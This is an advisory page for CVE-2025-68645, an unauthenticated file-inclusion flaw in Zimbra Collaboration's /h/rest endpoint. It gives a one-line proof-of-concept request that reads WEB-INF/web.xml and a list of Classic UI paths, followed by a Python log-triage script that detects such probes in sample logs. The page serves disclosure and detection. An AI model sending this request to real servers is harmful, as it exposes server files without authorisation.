Zimbra Collaboration Suite /h javax.servlet.include.path_info File Inclusion Vulnerability (CVE-2025-68645)

Date: 2025-12-30 | Affected software: Zimbra Collaboration Suite | PoC: public

Vulnerability description

A local file inclusion (LFI) vulnerability exists in the Webmail Classic UI of Zimbra Collaboration (ZCS) 10.0 and 10.1. Because the RestFilter servlet does not properly validate user-supplied request parameters, an unauthenticated remote attacker can send a crafted request to the /h/rest endpoint that alters the internal request dispatch, causing the server to include and return arbitrary files under the WebRoot directory (for example WEB-INF/web.xml, which is normally not served to clients).

PoC

GET /h/rest?javax.servlet.include.servlet_path=/WEB-INF/web.xml HTTP/1.1
Host: 

/h/ac
/h/addattendees
/h/addcontacts
/h/addcontactconfirmation
/h/addgroupcontact
/h/ads
/h/attachments
/h/calendar
/h/changepass
/h/checkspelling
/h/compose
/h/eappt
/h/econtact
/h/egroup
/h/etask
/h/grpcontacts
/h/task
/h/home
/h/homevoice
/h/imessage
/h/login
/h/maddrbooks
/h/mcalendars
/h/message
/h/mfolders
/h/mtags
/h/mtasks
/h/options
/h/postLoginRedirect
/h/printcalls
/h/printcalendar
/h/printvoicemails
/h/printappointments
/h/repeat
/h/rest
/h/search
/h/test
/h/upsell
/h/voicemail
/h/overviewAds
/h/sidebarads
/h/printcontacts
/h/printconversations
/h/printmessage
/h/printtasks
/h/briefcaseupload
/h/mbriefcases
/h/viewimages
/h/autoSaveDraft
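The following is an added log-triage example written for this page; it is not Zimbra's code and not part of the original PoC. It flags requests to the Classic UI /h/ paths whose query string carries a parameter in the javax.servlet.include.* namespace (the servlet_path / path_info names used above), URL-decodes the requested target so encoded ../ variants are visible, and marks a 200 response to /h/rest as the strongest success indicator. The log format (combined-log style) and the sample lines are constructed for illustration; the web.xml marker check assumes the attacker went after the file shown in the PoC.

```python
"""Triage helper for CVE-2025-68645 probing in web access logs.

Added example, not Zimbra's code. Log line format and samples are constructed.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Combined-log style (assumption: constructed format, adjust LOG_RE for your proxy)
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)

# Parameter names in this namespace control servlet include dispatch.
# A client has no legitimate reason to send them; their presence is the PoC signature.
SUSPICIOUS_PREFIX = "javax.servlet.include."

# Constructed sample lines: two probes from one source, two benign Classic UI requests.
SAMPLE_LOG = [
    '203.0.113.7 - - [30/Dec/2025:10:01:02 +0000] '
    '"GET /h/rest?javax.servlet.include.servlet_path=/WEB-INF/web.xml HTTP/1.1" 200 5312',
    '203.0.113.7 - - [30/Dec/2025:10:01:05 +0000] '
    '"GET /h/rest?javax.servlet.include.path_info=%2fWEB-INF%2fweb.xml HTTP/1.1" 404 512',
    '198.51.100.4 - - [30/Dec/2025:10:02:00 +0000] "GET /h/search?st=message HTTP/1.1" 200 8121',
    '198.51.100.4 - - [30/Dec/2025:10:02:10 +0000] "GET /h/rest?id=1 HTTP/1.1" 200 1200',
]


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match LOG_RE."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def find_include_params(target):
    """Return (path, [(name, decoded_value), ...]) for javax.servlet.include.* params."""
    parts = urlsplit(target)
    hits = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.startswith(SUSPICIOUS_PREFIX):
            # parse_qsl decodes once; decode again so %252e%252e style evasion shows up too
            hits.append((name, unquote(value)))
    return parts.path, hits


def triage(lines):
    """Return one finding per suspicious parameter seen on a /h/ request."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        path, hits = find_include_params(rec["target"])
        if not path.startswith("/h/") or not hits:
            continue
        for name, value in hits:
            findings.append({
                "ip": rec["ip"],
                "ts": rec["ts"],
                "path": path,
                "param": name,
                "value": value,
                "status": rec["status"],
                # 200 on /h/rest with an include parameter is the strongest signal;
                # any other status still shows the host was probed
                "likely_success": rec["status"] == 200 and path == "/h/rest",
            })
    return findings


def looks_like_web_xml(body):
    """True if a captured response body is a servlet deployment descriptor (what the PoC reads)."""
    return "<web-app" in body and "<servlet" in body


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        flag = "LIKELY SUCCESS" if f["likely_success"] else "probe"
        print(f"{f['ts']} {f['ip']} {f['path']} {f['param']}={f['value']} -> {f['status']} [{flag}]")
```

On the constructed sample the first probe (200 on /h/rest with servlet_path pointing at /WEB-INF/web.xml) is reported as a likely success and the encoded path_info variant as a probe; the benign /h/search and /h/rest?id=1 requests produce no findings. Because the vulnerability is reachable without authentication, a finding with status 200 should be followed by checking the response size against the real web.xml and reviewing the same source for follow-on requests.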
